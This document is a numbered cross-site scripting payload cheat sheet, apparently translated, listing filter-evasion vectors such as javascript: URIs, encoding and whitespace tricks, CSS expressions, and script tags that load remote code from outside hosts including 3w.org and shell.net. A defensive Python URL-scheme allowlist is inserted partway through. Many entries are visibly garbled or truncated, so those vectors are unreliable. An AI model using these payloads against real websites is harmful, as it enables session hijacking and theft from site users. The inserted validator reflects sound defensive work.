(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative pop-up variants
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript directive
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag with no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-digit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab to split the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab to split the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection, an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Working around a character limit (all fragments must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2 (null characters are basically ineffective in China, since there is nowhere they can be used)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=\'#\'" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes, or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT SRC=\'#\'" /span>

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC=\'#\'" /span>

(35) IMG LOWSRC
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META refresh with a link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC=\'#\'" /IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters inserted (1-32, 34, 39, 160, 8192-8, 13, 12288, 65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

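Items (3) through (14) and item (47) all exploit the same parsing behaviour: the browser decodes HTML character references once when it reads the attribute, discards certain code points inside the URL, and matches the scheme case-insensitively. A filter that searches for the literal string javascript: before those steps therefore misses every variant on this list. The Python check below is an added example written for this page, not code from the original post; it normalizes a URL attribute value the way the browser will read it and then allowlists the scheme instead of denylisting known-bad ones. The code point set follows item (47), with the page's "8192-8" read as 8192-8203 and NUL added because of item (17), both assumptions; ALLOWED_SCHEMES and the sample values are constructed for the example.

```python
import html
import re
from typing import Optional

# Code points the check discards inside a URL before reading the scheme.
# The set follows item (47) on this page: 1-32, 34, 39, 160, 8192-8203
# (assumption: the page's "8192-8" is read as 8192-8203), 12288 and 65279;
# 0 (NUL) is added because of item (17). Over-stripping only makes the
# check stricter, which is the safe direction for an allowlist.
IGNORED_CODEPOINTS = (
    set(range(0, 33)) | {34, 39, 160, 12288, 65279} | set(range(8192, 8204))
)

# Assumed allowlist: schemes this application is willing to emit in
# src/href/background attributes. Everything else, including javascript:
# (items (3)-(14)) and vbscript: (item (40)), is rejected.
ALLOWED_SCHEMES = frozenset({"http", "https", "mailto"})

# RFC 3986 scheme syntax, matched after normalization (hence lowercase only).
_SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.\-]*):")


def normalize_url(value: str) -> str:
    """Reduce an attribute value to what the browser will actually interpret.

    The order mirrors the browser: character references are decoded once
    when the attribute is parsed (items (5), (8), (9), (10): decimal, hex,
    with or without semicolons, with zero padding), then the ignored code
    points are dropped (items (11)-(14), (47)), then the result is
    lowercased because scheme matching is case-insensitive (item (4)).
    """
    decoded = html.unescape(value)
    stripped = "".join(ch for ch in decoded if ord(ch) not in IGNORED_CODEPOINTS)
    return stripped.lower()


def url_scheme(value: str) -> Optional[str]:
    """Effective scheme of an attribute value, or None for a relative URL."""
    match = _SCHEME_RE.match(normalize_url(value))
    return match.group(1) if match else None


def is_safe_url(value: str) -> bool:
    """True when the value is relative or uses an allowlisted scheme."""
    scheme = url_scheme(value)
    return scheme is None or scheme in ALLOWED_SCHEMES


if __name__ == "__main__":
    # Constructed sample attribute values: two benign, the rest shaped like
    # the evasions this page lists (case mixing, an entity-encoded letter,
    # an embedded tab, an ideographic space, a vbscript: scheme).
    samples = [
        "https://example.com/logo.png",
        "/static/logo.png",
        "JaVaScRiPt:alert('XSS')",
        "&#106;avascript:alert('XSS')",
        "jav\tascript:alert('XSS')",
        "\u3000javascript:alert('XSS')",
        "vbscript:msgbox('XSS')",
    ]
    for sample in samples:
        print(f"safe={is_safe_url(sample)!s:<5} scheme={url_scheme(sample)!r:<13} {sample!r}")
```

Run it as a script to see each sample's effective scheme and verdict. The design point is that the check is applied to the normalized value and is an allowlist: a new scheme or a new whitespace trick that a browser starts tolerating can only ever move a value from "allowed" to "rejected", never the other way round, whereas a denylist of strings such as javascript: has to anticipate every encoding on this page and the next one.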
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (an open angle bracket followed by a letter is enough)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>